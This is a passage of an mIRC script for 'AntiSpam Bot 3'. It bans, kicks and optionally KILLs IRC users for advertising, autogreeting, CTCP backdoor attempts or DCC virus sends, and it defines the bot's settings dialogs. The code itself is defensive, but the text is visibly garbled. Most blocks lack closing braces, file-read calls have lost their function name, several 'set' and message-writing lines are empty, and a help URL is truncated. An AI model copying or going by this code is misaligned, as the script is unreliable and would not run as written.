      if ($" $+ $scriptdir $+ exclude $+ ", wn, *, %antispam.cycle) iswm $1) { 
        return $true  
  unset %antispam.cycle
  return $false

alias -l asignore {
  ; $asignore(<address>)
  if ($exists(" $+ $scriptdir $+ ignore $+ ") == $true) {
    set %antispam.cycle 0
    while (%antispam.cycle < $lines(" $+ $scriptdir $+ ignore $+ ")) {
      inc %antispam.cycle
      if ($" $+ $scriptdir $+ ignore $+ ", wn, *, %antispam.cycle) iswm $1) { 
        return $true  
  unset %antispam.cycle
  return $false

alias -l askick {
  ; Usage: /askick nick!user@host <reason/code>
  var %antispam.nickname $gettok($1,1,33)
  if (%antispam.nickname == $me) { return }

  if ($asexclude($1) == $true) { return }

  ; kill 
  if (o isin $usermode) && ($asini(autokill,$remove($remove($2,]),[)) == yes) {
    KILL %antispam.nickname $askillmsg($2)

  ; cycle channels that this user is on
  set %antispam.privkick 0
  while (%antispam.privkick < $chan(0)) {
    inc %antispam.privkick
    if (%antispam.nickname ison $chan(%antispam.privkick)) {

      if (($me isop $chan(%antispam.privkick)) && ($asgoodchan($chan(%antispam.privkick)) == $true)) {

        set %antispam.nokick $false

        ; Flag checks
        if ($2 == [ma/inv]) { var %antispam.flagchk i }
        if ($2 == [exp/vrs]) { var %antispam.flagchk s }
        if ($2 == [ma/web]) { var %antispam.flagchk w }
        if ($2 == [ma/net]) { var %antispam.flagchk n }
        if ($2 == [exp/bd]) { var %antispam.flagchk b }
        if ($2 == [autogreet]) { var %antispam.flagchk a }
        if (%antispam.flagchk !isin $aschanconfig($chan(%antispam.privkick),flags)) { set %antispam.nokick $true }

        if (%antispam.nickname isop $chan(%antispam.privkick)) && (o isin $aschanconfig($chan(%antispam.privkick),flags)) {
          set %antispam.nokick $true
        if (%antispam.nickname isvo $chan(%antispam.privkick)) && (v isin $aschanconfig($chan(%antispam.privkick),flags)) {
          set %antispam.nokick $true

        if (%antispam.nokick == $false) {
          set %askickmsg $2-
          set %askickmsg $replace(%askickmsg,(channel),$chan(%antispam.privkick))

          ban -u $+ $aschanconfig($chan(%antispam.privkick),bantime) $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype))

          if ($2 == $null) {
            if (o isin $usermode) && ($asini(autokill,$remove($remove($2,]),[)) == yes) {
            else {
              kick $chan(%antispam.privkick) %antispam.nickname $2-
            if (f isin $aschanconfig($chan(%antispam.privkick),flags)) {
              asfkick $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype)) %antispam.nickname $2-
            var %antispam.kicked. [ $+ [ $chan(%antispam.privkick) ] ] $true
          else {
            if (o isin $usermode) && ($asini(autokill,$remove($remove($2,]),[)) == yes) {
            else { 
              kick $chan(%antispam.privkick) %antispam.nickname $askickmsg($2)
              var %antispam.kicked. [ $+ [ $chan(%antispam.privkick) ] ] $true
            if (f isin $aschanconfig($chan(%antispam.privkick),flags)) {
              asfkick $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype)) %antispam.nickname $askickmsg($2)

    else {
      ; This section deals with outsite inviters 
      ; it works by doing filter kick on each channel with fkick enabled
      if (f isin $aschanconfig($chan(%antispam.privkick),flags)) {
        if (($asgoodchan($chan(%antispam.privkick)) == $true) && ($ialchan($mask($1,2),$chan(%antispam.privkick),0) > 0)) {
          ban -u $+ $aschanconfig($chan(%antispam.privkick),bantime) $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype))
          if ($2 == $null) {
            asfkick $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype)) %antispam.nickname $2-
            var %antispam.kicked. [ $+ [ $chan(%antispam.privkick) ] ] $true
          else {
            asfkick $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype)) %antispam.nickname $askickmsg($2)
            var %antispam.kicked. [ $+ [ $chan(%antispam.privkick) ] ] $true

  ; Recent
  set %antispam.privkick 0
  while (%antispam.privkick < $chan(0)) {
    inc %antispam.privkick
    if ($asgoodchan($chan(%antispam.privkick)) == $true) {
      if (r isin $aschanconfig($chan(%antispam.privkick),flags)) {
        if (%antispam.kicked. [ $+ [ $chan(%antispam.privkick) ] ] != $true) {
          if ($hget(antispam. $+ $chan(%antispam.privkick))) {

            if ($hmatch(antispam. $+  $chan(%antispam.privkick), $1, 0) > 0) {

              set %antispam.nokick $false

              ; Flag checks
              if ($2 == [ma/inv]) { var %antispam.flagchk i }
              if ($2 == [exp/vrs]) { var %antispam.flagchk s }
              if ($2 == [ma/web]) { var %antispam.flagchk w }
              if ($2 == [ma/net]) { var %antispam.flagchk n }
              if ($2 == [exp/bd]) { var %antispam.flagchk b }
              if ($2 == [autogreet]) { var %antispam.flagchk a }
              if (%antispam.flagchk !isin $aschanconfig($chan(%antispam.privkick),flags)) { set %antispam.nokick $true }

              if ((%antispam.nokick == $false) && ($me isop $chan(%antispam.privkick))) {
                ban -u $+ $aschanconfig($chan(%antispam.privkick),bantime) $chan(%antispam.privkick) $mask($1,$aschanconfig($chan(%antispam.privkick),bantype))
                asecho $colour(info) A user matching the mask $mask($1,$aschanconfig($chan(%antispam.privkick),bantype)) was on $chan(%antispam.privkick) within the last 5 minutes and is being banned.
              hdel -w antispam. $+ $chan(%antispam.privkick) $hmatch(antispam. $+  $chan(%antispam.privkick), $1, 1)

  unset %antispam.privkick %askickmsg %antispam.nokick

alias -l asfkick {
  if ($me !isop $1) { return }
  ; usage /asfkick <channel> <mask> <exclude> <reason>
  set %antispam.fkick 0
  while (%antispam.fkick < $ialchan($2, $1, 0)) {
    inc %antispam.fkick
    if (($ialchan($2, $1, %antispam.fkick).nick != $3) && ($ialchan($2, $1, %antispam.fkick).nick != $me) && ($ialchan($2, $1, %antispam.fkick).nick !isop $1)) {

      set %antispam.nokick $false
      if (%antispam.nickname isop $1) && (o isin $aschanconfig($1,flags)) {
        set %antispam.nokick $true
      if (%antispam.nickname isvo $1) && (v isin $aschanconfig($1,flags)) {
        set %antispam.nokick $true
      if (%antispam.nokick == $false) { KICK $1 $ialchan($2,$1,%antispam.fkick).nick $4- }

alias -l antispam.reset {
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize nickname $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) 
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general relaychan #AntiSpamBot
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general cycletime $calc(60 * 15)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general relay yes
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize identify no
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize randomize no
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general reconnect no
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general visible no

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize fullname
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize ident antispam
  remini " $+ $scriptdir $+ antispam.ini $+ " personalize password
  remini " $+ $scriptdir $+ antispam.ini $+ " general server

  if ($exists(" $+ $scriptdir $+ kickmsg.txt $+ ") == $false) {
    write -c " $+ $scriptdir $+ kickmsg.txt $+ "
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/web]:Please do not advertise your website on this channel
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/inv]:Please do not advertise your channel on this channel
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/net]:Please do not advertise your network or server on this channel
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [exp/bd]:Please do not attempt to exploit users
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [exp/vrs]:You are sending viruses to other users, please visit
    write -a " $+ $scriptdir $+ kickmsg.txt $+ " [autogreet]:Autogreets are not allowed on this channel
  if ($exists(" $+ $scriptdir $+ killmsg.txt $+ ") == $false) {
    write -c " $+ $scriptdir $+ killmsg.txt $+ "
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [ma/net]:Network advertising is not allowed on this network. 
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [ma/web]:Website advertising is not allowed on this network.
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [ma/inv]:Channel advertising is not allowed on this network, if you continue the channel may be closed.
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [exp/bd]:Please do not attempt to exploit users
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [exp/vrs]:You are autosending viruses to other users via DCC. Please visit http://www.nohack for help.
    write -a " $+ $scriptdir $+ killmsg.txt $+ " [exp/bd]:Do not attempt to exploit other users via CTCP backdoors.
  if ($exists(" $+ $scriptdir $+ ignore $+ ") == $false) { write -c " $+ $scriptdir $+ ignore $+ " }
  if ($exists(" $+ $scriptdir $+ exclude $+ ") == $false) { 
    write -c " $+ $scriptdir $+ exclude $+ " 
    write -a " $+ $scriptdir $+ exclude $+ " NickServ!*@*
    write -a " $+ $scriptdir $+ exclude $+ " MemoServ!*@*
    write -a " $+ $scriptdir $+ exclude $+ " OperServ!*@*
    write -a " $+ $scriptdir $+ exclude $+ " RootServ!*@*
    write -a " $+ $scriptdir $+ exclude $+ " ChanServ!*@*
    write -a " $+ $scriptdir $+ exclude $+ " *!*

  if ($exists(" $+ $scriptdir $+ reply $+ ") == $false) { write -c " $+ $scriptdir $+ reply $+ " }

on *:DIALOG:antispam:sclick:7:{
  if ($did(antispam,7).state == 0) { did -m antispam 8 }
  if ($did(antispam,7).state == 1) { did -n antispam 8 }

on *:DIALOG:antispam:sclick:21:{
  if ($did(antispam,21).state == 0) { did -m antispam 24 }
  if ($did(antispam,21).state == 1) { did -n antispam 24 }

on *:DIALOG:antispam:sclick:42:{
  asaddchan $$?="Enter channel name"

on *:DIALOG:antispam:sclick:43:{
  asdelchan $did(antispam,40,$did(antispam,40).sel).text

on *:DIALOG:antispam:sclick:47:{
  if ($did(antispam,40,$did(antispam,40).sel).text == $null) { return }
  set %antispam.chanconfig $did(antispam,40,$did(antispam,40).sel).text
  if ($dialog(asdia.chanconfig) == $null) {
    dialog -m asdia.chanconfig asdia.chanconfig

alias -l asaddchan {
  if (($left($1,1) == $chr(35)) || ($left($1,1) == $chr(38))) {
    if ($chr(44) !isin $1) {
      writeini -s " $+ $scriptdir $+ antispam.ini $+ " channels channels $addtok($asini(channels,channels),$gettok($1,1,32),32) 
      if ($sock(antispam).name != $null) {
        asaddjoin $1

alias -l asdelchan {
  if ($findtok($asini(channels,channels),$1,1,32) != $null) {
    if ($deltok($asini(channels,channels),$findtok($asini(channels,channels) ,$1,1,32),32) != $null) {
      writeini -s " $+ $scriptdir $+ antispam.ini $+ " channels channels $deltok($asini(channels,channels),$findtok($asini(channels,channels) ,$1,1,32),32)
    else {
      remini " $+ $scriptdir $+ antispam.ini $+ " channels channels
    remini " $+ $scriptdir $+ antispam.ini $+ " channel. $+ $1
    if ($hget(antispam. $+ $1) != $null) { hfree antispam. $+ $1 }
    if ($sock(antispam).name != $null) {
      asaddpart $1 " $+ $scriptdir $+ antispam.ini $+ " channels channels

on *:DIALOG:antispam:sclick:50:{
  if ($did(antispam,16) != $asini(personalize,nickname)) {
    if ($sock(antispam).name != $null) {
      set %antispam.packet NICK $asnickname($did(antispam,16)) $+ $crlf $+ WATCH C
      if (? !isin $did(antispam,16)) && ($chr(35) !isin $did(antispam,16)) {
        set %antispam.packet %antispam.packet + $+ $did(antispam,16)
      set %antispam.packet %antispam.packet S
    if ($sock(antispam) != $null) { sockwrite -n antispam %antispam.packet }
    unset %antispam.packet

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize identify $astc2($did(antispam,11).state)
  if ($did(antispam,12).text != $null) {
    writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize password $did(antispam,12).text

  if ($asini(personalize,password) == $null) {
    writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize identify no

  if ($did(antispam,8) == $null) { return }
  if ($did(antispam,10) == $null) { return }
  if ($did(antispam,16) == $null) { return }
  if ($did(antispam,18) == $null) { return }
  if ($did(antispam,20) == $null) { return }
  if ($did(antispam,7) == $null) { return }

  if ($did(antispam,62).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/web yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/web no }
  if ($did(antispam,63).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/inv yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/inv no }
  if ($did(antispam,64).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/net yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill ma/net no }
  if ($did(antispam,65).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill exp/bd yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill exp/bd no }
  if ($did(antispam,66).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill exp/vrs yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " autokill exp/vrs no }

  ; if ($asini(autokill,ma/web) == yes) { did -c $dname 62 }

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general cycletime $calc($did(antispam,10) * 60)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize nickname $did(antispam,16)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general relaychan $did(antispam,8)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize fullname $did(antispam,18)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize ident $did(antispam,20)

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general relay $astc2($did(antispam,7).state)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize randomize $astc2($did(antispam,25).state)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " personalize hold $astc2($did(antispam,26).state)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " general reconnect $astc2($did(antispam,44).state)

  if ($did(antispam,46).state == 1) { writeini -s " $+ $scriptdir $+ antispam.ini $+ " general visible yes }
  else { writeini -s " $+ $scriptdir $+ antispam.ini $+ " general visible no }

  ; save kick messages
  write -c " $+ $scriptdir $+ kickmsg.txt $+ "
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/web]: $+ %antispam.set.web
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/inv]: $+ %antispam.set.inv
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [ma/net]: $+
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [exp/bd]: $+
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [exp/vrs]: $+ %antispam.set.vrs
  write -a " $+ $scriptdir $+ kickmsg.txt $+ " [autogreet]: $+ %antispam.set.greet
  unset %antispam.set.*
  .timerascycle -o 0 $asini(general,cycletime) ascycleall

on *:DIALOG:antispam:init:0:{
  if ($asini(general,relay) == yes) { did -c $dname 7 } 
  if ($asini(personalize,identify) == yes) { 
    did -c $dname 11 


  did -a $dname 12 $asini(personalize,password)

  if ($asini(personalize,randomize) == yes) { did -c $dname 25 } 
  if ($asini(personalize,hold) == yes) { did -c $dname 26 }
  if ($asini(general,reconnect) == yes) { did -c $dname 44 } 
  if ($asini(general,visible) == yes) { did -c $dname 46 }

  if ($did(antispam,7).state == 0) { did -m antispam 8 }
  if ($did(antispam,7).state == 1) { did -n antispam 8 }

  ; set edit boxes
  did -o antispam 8 1 $asini(general,relaychan)
  did -o antispam 10 1 $calc($asini(general,cycletime) / 60)
  did -o antispam 16 1 $asini(personalize,nickname)
  did -o antispam 18 1 $asini(personalize,fullname)
  did -o antispam 20 1 $asini(personalize,ident)

  ; "Kills" tab
  if (o !isin $usermode) { did -b antispam 61,62,63,64,65,66 }

  if ($asini(autokill,ma/web) == yes) { did -c $dname 62 }
  if ($asini(autokill,ma/inv) == yes) { did -c $dname 63 }
  if ($asini(autokill,ma/net) == yes) { did -c $dname 64 }
  if ($asini(autokill,exp/bd) == yes) { did -c $dname 65 }
  if ($asini(autokill,exp/vrs) == yes) { did -c $dname 66 }

  ; "messages" tab
  did -a antispam 72 Website advertisments
  did -a antispam 72 Channel advertisments
  did -a antispam 72 Server or network advertisments
  did -a antispam 72 CTCP backdoor attempts
  did -a antispam 72 DCC sends
  did -a antispam 72 Autogreeting
  did -c antispam 72 1

  did -a antispam 74 %antispam.set.web


on *:dialog:antispam:sclick:72:{
  did -r antispam 74
  if ($did(antispam,72).sel == 1) { did -a antispam 74 %antispam.set.web }
  if ($did(antispam,72).sel == 2) { did -a antispam 74 %antispam.set.inv }
  if ($did(antispam,72).sel == 3) { did -a antispam 74 }
  if ($did(antispam,72).sel == 4) { did -a antispam 74 }
  if ($did(antispam,72).sel == 5) { did -a antispam 74 %antispam.set.vrs }
  if ($did(antispam,72).sel == 6) { did -a antispam 74 %antispam.set.greet }

on *:dialog:antispam:edit:74:{
  if ($did(antispam,72).sel == 1) { set %antispam.set.web $did(antispam,74).text }
  if ($did(antispam,72).sel == 2) { set %antispam.set.inv $did(antispam,74).text }
  if ($did(antispam,72).sel == 3) { set $did(antispam,74).text }
  if ($did(antispam,72).sel == 4) { set $did(antispam,74).text }
  if ($did(antispam,72).sel == 5) { set %antispam.set.vrs $did(antispam,74).text }
  if ($did(antispam,72).sel == 6) { set %antispam.set.greet $did(antispam,74).text }

alias -l asrefreshlist {
  did -r antispam 40
  set %antispam.aschans 0
  while (%antispam.aschans < $aschannels(0)) {
    inc %antispam.aschans
    did -a antispam 40 $aschannels(%antispam.aschans)

  unset %antispam.cycle

; command aliases - idea from lady_vampyra
alias asme {
  if ($1 == $null) { 
    echo $colour(info) $chan * /asme: insufficient parameters
  if ($asnick !ison $chan) {
    echo $colour(info) $chan * /asme: $asnick is not on this channel
  as.queue PRIVMSG $chan : $+ $Chr(1) $+ ACTION $1- $+ $Chr(1)
alias assay {
  if ($1 == $null) { 
    echo $colour(info) $chan * /assay: insufficient parameters
  if ($asnick !ison $chan) {
    echo $colour(info) $chan * /assay: $asnick is not on this channel
  as.queue PRIVMSG $chan : $+  $1- 

; Communication aliases
alias asmsg {
  if ($2 == $null) { 
    echo $colour(info) $chan * /asmsg: insufficient parameters
  if ($sock(antispam) == $null) {
    echo $colour(info) $chan * /asmsg: antispam bot is not connected
  if ($window(@antispambot)) {
    asecho 1 -> * $+ $1 $+ * $2-
  as.queue PRIVMSG $1 : $+  $2- 
alias asnotice {
  if ($2 == $null) { 
    echo $colour(info) $chan * /asnotice: insufficient parameters
  if ($sock(antispam) == $null) {
    echo $colour(info) $chan * /asnotice: antispam bot is not connected
  if ($window(@antispambot)) {
    asecho 1 -> - $+ $1 $+ - $2-
  as.queue NOTICE $1 : $+  $2- 

alias -l astc {
  if ($1 == yes) { return 1 }
  else { return 1 }
alias -l astc2 {
  if ($1 == 1) { return yes }
  else { return no }

on *:dialog:asdia.connect:init:0: {
  did -i asdia.connect 1 1 $asini(general,server)

on *:dialog:asdia.chanconfig:sclick:50:{
  ; compile flags
  set %antispam.cflags d
  if ($did(asdia.chanconfig,1).state == 1) { set %antispam.cflags %antispam.cflags $+ j }
  if ($did(asdia.chanconfig,2).state == 1) { set %antispam.cflags %antispam.cflags $+ c }
  if ($did(asdia.chanconfig,3).state == 1) { set %antispam.cflags %antispam.cflags $+ f }
  if ($did(asdia.chanconfig,4).state == 1) { set %antispam.cflags %antispam.cflags $+ r }
  if ($did(asdia.chanconfig,5).state == 1) { set %antispam.cflags %antispam.cflags $+ o }
  if ($did(asdia.chanconfig,6).state == 1) { set %antispam.cflags %antispam.cflags $+ v }

  if ($did(asdia.chanconfig,20).state == 1) { set %antispam.cflags %antispam.cflags $+ w }
  if ($did(asdia.chanconfig,21).state == 1) { set %antispam.cflags %antispam.cflags $+ i }
  if ($did(asdia.chanconfig,22).state == 1) { set %antispam.cflags %antispam.cflags $+ n }
  if ($did(asdia.chanconfig,23).state == 1) { set %antispam.cflags %antispam.cflags $+ b }
  if ($did(asdia.chanconfig,24).state == 1) { set %antispam.cflags %antispam.cflags $+ s }
  if ($did(asdia.chanconfig,25).state == 1) { set %antispam.cflags %antispam.cflags $+ a }

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ %antispam.chanconfig bantype $calc($did(asdia.chanconfig,32).sel - 1)
  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ %antispam.chanconfig bantime $calc($did(asdia.chanconfig,34).text * 60)

  writeini -s " $+ $scriptdir $+ antispam.ini $+ " channel. $+ %antispam.chanconfig flags %antispam.cflags

  unset %antispam.chanconfig %antispam.cflags

on *:dialog:asdia.chanconfig:init:0 {
  ; tab 1
  if (j isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 1 }
  if (c isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 2 }
  if (f isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 3 }
  if (r isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 4 }
  if (o isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 5 }
  if (v isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 6 }

  ; tab 2 - protection
  if (w isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 20 }
  if (i isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 21 }
  if (n isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 22 }
  if (b isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 23 }
  if (s isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 24 }
  if (a isin $aschanconfig(%antispam.chanconfig,flags)) { did -c asdia.chanconfig 25 }

  ; tab 3 - settings
  ; combo box 
  did -a asdia.chanconfig 32 0: *!user@host.domain 
  did -a asdia.chanconfig 32 1: *!*user@host.domain
  did -a asdia.chanconfig 32 2: *!*@host.domain
  did -a asdia.chanconfig 32 3: *!*user@*.domain
  did -a asdia.chanconfig 32 4: *!*@*.domain
  did -a asdia.chanconfig 32 5: nick!user@host.domain
  did -a asdia.chanconfig 32 6: nick!*user@host.domain
  did -a asdia.chanconfig 32 7: nick!*@host.domain
  did -a asdia.chanconfig 32 8: nick!*user@*.domain
  did -a asdia.chanconfig 32 9: nick!*@*.domain

  did -c asdia.chanconfig 32 $calc($aschanconfig(%antispam.chanconfig,bantype) + 1)

  did -a asdia.chanconfig 34 $calc($aschanconfig(%antispam.chanconfig,bantime) / 60)


on *:dialog:asdia.connect:sclick:10: {
  if ($gettok($did(asdia.connect,1).text,1,32) == $null) { 
    asconnect $server $gettok($did(asdia.connect,2).text,1,32)
  asconnect $gettok($did(asdia.connect,1).text,1,32) $gettok($did(asdia.connect,2).text,1,32)

dialog asdia.connect { 
  title "Connect AntiSpam Bot" 
  size -1 -1 250 130
  Edit $server,1, 70 20 170 22, autohs
  Edit "6667",2, 70 49 60 22
  text "Server:",3, 15 22 35 20
  text "Port:",4, 15 52 30 20

  button "&Connect...",10, 75 95 80 23, ok default
  button "C&ancel",11, 160 95 80 23, cancel

dialog asdia.chanconfig { 
  title Configuration for %antispam.chanconfig
  size -1 -1 310 280
  button "OK",50, 5 245 80 23, ok
  button "Cancel",51, 95 245 80 23, Cancel

  tab "General",53,5 10 300 230
  tab "Protection",52
  tab "Settings",54

  ; General
  check "Stay in this channel",1, 15 45 190 25, tab 53
  check "Cycle this channel",2, 15 67 150 25, tab 53
  check "Filter kick when banning",3, 15 89 150 25, tab 53
  check "Ban spammers if they were recently on the channel",4, 15 111 260 25, tab 53
  check "Exclude opped users when kicking",5, 15 144 250 25, tab 53
  check "Exclude voiced users when kicking",6, 15 166 250 25, tab 53

  ; Protection
  check "Website advertisments",20, 15 65 250 25, tab 52
  check "Channel advertisments",21, 15 87 250 25, tab 52
  check "Server or network advertisments",22, 15 109 250 25, tab 52
  check "CTCP backdoor attempts",23, 15 131 250 25, tab 52
  check "DCC sends",24, 15 153 250 25, tab 52
  check "Autogreeting",25, 15 175 250 25, tab 52

  text "Users in this channel will be kicked for the following:",11, 15 45 250 20,tab 52

  ; Settings
  text "Ban mask type:",31, 20 55 100 20,tab 54
  combo 32,120 52 150 250, drop tab 54

  text "Ban users for:",33, 20 87 100 20,tab 54
  edit $null, 34, 119 82 50 22, tab 54
  text "minutes",35, 175 87 100 20,tab 54


dialog antispam { 
  title "AntiSpam Bot 3 by sct" 

  size -1 -1 370 370

  tab "General",32,5 10 350 220
  tab "Personalize",33
  tab "Channels",34
  tab "Messages",36
  tab "Kills",35

  ; General (tab 2)
  check "R&econnect if the bot becomes disconnected",44, 15 158 260 25,tab 32

  check "Relay to:",7, 15 48 100 25,tab 32
  Edit $null, 8, 130 50 170 22,tab 32 

  text "Cycle time: (in minutes)",9, 15 90 150 25,tab 32 
  Edit $null, 10, 130 87 60 22,tab 32 

  check "Identify:",11, 15 117 115 25,tab 32 
  Edit $null, 12, 130 117 170 22, pass tab 32 

  check "Set mode -i on myself on connect (visible)",46, 15 180 240 25, tab 32

  ; Personalize (tab 3)
  text "Nickname:",15, 15 53 100 22,tab 33
  Edit $null,16, 130 50 170 22,tab 33

  check "Randomize on cycle",25, 131 73 120 25,tab 33
  check "Hold nick",26, 131 95 100 25,tab 33

  text "Full name:",17, 15 133 90 22,tab 33
  Edit $null,18, 130 130 170 22,tab 33 autohs

  text "User name/identd:",19, 15 162 90 22,tab 33
  Edit $null,20, 130 158 170 22,tab 33

  ; channels (tab 4)
  list 40, 14 65 230 140 , sort tab 34
  text "Specify the channels to autojoin here.",41, 15 43 180 22,tab 34
  button "Add...",42, 250 65  80 23, tab 34
  button "Remove",43, 250 95 80 23, tab 34
  button "Settings...",47, 250 125 80 23, tab 34

  ; Kills (tab 7)
  text "IRCops may enable these options to KILL users automatically.",61, 15 43 300 22,tab 35
  check "Kill for website advertisments",62, 15 65 200 25,tab 35
  check "Kill for channel advertisments",63, 15 87 200 25,tab 35
  check "Kill for server or network advertisments",64, 15 109 200 25,tab 35
  check "Kill for CTCP backdoor attempts",65, 15 131 200 25,tab 35
  check "Kill for DCC sends",66, 15 153 200 25,tab 35

  ; messages (36)
  text "Offence:",71, 20 53 300 22,tab 36
  combo 72,20 73 200 150, drop tab 36
  text "Message:",73, 20 110 300 22,tab 36
  edit $null,74,19 130 300 22, tab 36 autohs

  button "OK",50, 5 338 80 23, ok
  button "Cancel",51, 95 338 80 23, Cancel
  text "T   h   E     B   e   s   T        A     n     t     i     s     p     a     m        B     o     t ",999, 2 240 400 32
  text "T  h  E    B  e  s  T      A    n    t    i    s    p    a    m       B    o    t ",989, 30 255 400 32
  text "T  h  E    B  e  s  T      A   n   t   i   s   p   a   m      B   o   t ",888, 45 270 400 32,disable
  text "T h E   B e s T    A  n  t  i  s  p  a  m    B  o  t ",889, 70 290 400 32,disable
  text "ThE  BesT   A n t i s p a m   B o t ",899, 90 310 400 32,disable

alias -l asautoreply {
  ; $asautoreply(type,text)
  ; example: $asutoreply(privmsg,Are you alone ?)

  set %antispam.cycle 0
  while (%antispam.cycle < $lines(" $+ $scriptdir $+ reply $+ ")) {
    inc %antispam.cycle
    if ($" $+ $scriptdir $+ reply $+ ", wn, *, %antispam.cycle) != $null) {
      if ($gettok($" $+ $scriptdir $+ reply $+ ", wn, *, %antispam.cycle),1,58) == $1) {
        if ($gettok($" $+ $scriptdir $+ reply $+ ", wn, *, %antispam.cycle),2,58) iswm $2) {
          return $gettok($" $+ $scriptdir $+ reply $+ ", wn, *, %antispam.cycle),3,58)
  unset %antispam.cycle

on *:QUIT:{
  set %antispam.cycle 0
  while (%antispam.cycle < $comchan($nick,0)) {
    inc %antispam.cycle
    if $asgoodchan($comchan($nick,%antispam.cycle)) {
      hadd -m antispam. $+ $comchan($nick,%antispam.cycle) $fulladdress $ctime
  unset %antispam.cycle

on *:PART:*:{
  ; This code will remember that the user was just on the channel
  if ($sock(antispam) == $null) { return }
  if ($timer(asexpire) == $null) { .timerasexpire 0 60 asexpire }

  if ($asgoodchan($chan) == $true) {
    if ($nick == $me) {
      if ($hget(antispam. $+ $chan) != $null) { hfree antispam. $+ $chan }
    else {
      hadd -m antispam. $+ $chan $fulladdress $ctime

alias -l asclearrecent {
  set %antispam.aschans 0
  while (%antispam.aschans < $aschannels(0)) {
    inc %antispam.aschans
    hfree -w antispam. $+ $aschannels(%antispam.aschans) 
  unset %antispam.aschans %antispam.hashname

  sockclose antisp
  unset %antisp

on *:EXIT:{
  unset %antispam.*

alias -l asexpire {
  ; Recent user expire (5 minutes)

  set %antispam.aschans 0
  while (%antispam.aschans < $aschannels(0)) {
    inc %antispam.aschans
    set %antispam.expire 0

    set %antispam.hashname antispam. $+ $aschannels(%antispam.aschans)

    while (%antispam.expire < $hmatch(%antispam.hashname,*,0)) {
      inc %antispam.expire
      ; This piece of code removes 
      if ($calc($ctime - $gettok($hget(%antispam.hashname,$hget(%antispam.hashname,%antispam.expire).item),1,32)) >= 300) {
        hdel -w antispam. $+ $aschannels(%antispam.aschans) $hmatch(%antispam.hashname,*,%antispam.expire)
  unset %antispam.aschans %antispam.hashname %antispam.expire

; This event enables or disables the "Kills" dialog depending on whether I have
; changed to an IRCop or not.
on *:USERMODE:{ 
  if ($dialog(antispam) != $null) {
    if (o !isin $usermode) {
      did -b antispam 61,62,63,64,65,66
    else {
      did -e antispam 61,62,63,64,65,66

; The identd idea and parts of the code are by wshs
on *:socklisten:antispam.identd:{
  if ($sock(antispam.identdin) != $null) { sockclose antispam.identdin }
